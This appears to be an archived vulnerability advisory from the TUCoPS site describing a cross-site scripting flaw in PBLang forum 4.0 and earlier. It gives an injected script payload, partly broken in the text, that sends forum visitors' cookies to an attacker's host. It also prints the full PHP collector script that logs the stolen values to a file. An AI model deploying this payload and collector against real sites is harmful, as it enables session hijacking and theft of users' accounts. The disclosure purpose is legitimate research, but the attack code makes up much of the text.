Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web BBS :: etc :: bt728.txt

PBLang Forum XSS Vul

PBLang is a web forum written by PHP language. A security vulnerability in 

the product allows posting of HTML code and JavaScript into existing web 

pages thus causing it to be executed on the client end (a Cross-Site 

Scripting vuln).


Vulnerable systems: PBLang forum

Version:   4.0 or lower


Problem: Cross Site Scripting (XSS)


If someone inserts <script>`anyscript`</script> instead of the post’s 

content, the JavaScript code is executed by Internet Explorer or some 

other web browsers. This allows stealing of cookie data and other 

interesting things… 


Inserting a new topic (or reply) with the following script, it will send 

visitor's cookies to your host. The output is saved to http://your-





(document.cookie), "subwindows", "height=100,width=486")</script>



Or insert every scripts – Java and HTML (ex: javascript:history.go(-1), 

window.write(‘Hello world’), javascript:alert(‘Hi!!!’)… )

* Code of docs.php:*




//Copyright by W_Hat (

define ("LINE", "\r\n");

define ("HTML_LINE", "<br>"); 

function getvars($arr, $title)


$res = "";

$len = count($arr);

if ($len>0)


if (strlen($title)>0)


print("[--------$title--------]" . HTML_LINE);

$res .= "[--------$title--------]" . LINE;


foreach ($arr as $key => $value)


print("[$key]" . HTML_LINE);

print($arr[$key] . HTML_LINE);

$res .= "[$key]" . LINE . $arr[$key] . LINE;



return $res;


// get current date

$now = date("Y-m-d H:i:s"); 

// init

$myData = "[-----$now-----]" . LINE; 

// get

$myData .= getvars($HTTP_GET_VARS, ""); 

// file

$file = $REMOTE_ADDR . "cookie.txt";

$mode = "r+";

if (!file_exists($file))

$mode = "w+";

$fp = fopen ($file, $mode);

fseek($fp, 0, SEEK_END);

fwrite($fp, $myData);





Name: Quan Van Truong


Occupation: Bug Hunter

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH